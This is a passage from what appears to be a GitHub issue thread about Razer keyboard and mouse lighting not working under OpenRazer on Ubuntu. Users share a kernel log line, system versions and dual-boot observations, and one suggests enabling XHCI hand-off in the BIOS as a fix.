[    9.291574] razermouse 0003:1532:0099.0005: hidraw4: USB HID v1.11 Device [Razer Razer Basilisk V3] on usb-0000:0c:00.3-3.1/input3
```

Is there someone looking into this problem being almost a year old now?

ryczypior, 2025-07-28:
I have the same problem with my BlackWidow v4 pro running on ubuntu 24.04 (dual boot with win 11), but I've noticed some weird behaviour:
1. If I plug in some USB device to kbd usb passthrough - back lighting is active on ubuntu but NOT on win 11
2. If no device is plugged - no lights on Ubuntu, but their are turned on on windows.
Both - on win or ubunu - only replugg the kbd seems to work. Setting options in OpenRazer or Synapse doesn't work.
OS set (dual boot): 
- win 11 (with the latest Synapse 4), 
- ubuntu 24.04.01, kernel 6.8.0-64, openrazer 3.10.3
- latest kbd firmware

8hodgsonkh, 2026-10-22:
sorry for necro but if anyone else comes accross this issue, enabling xhci hand off in bios fixes it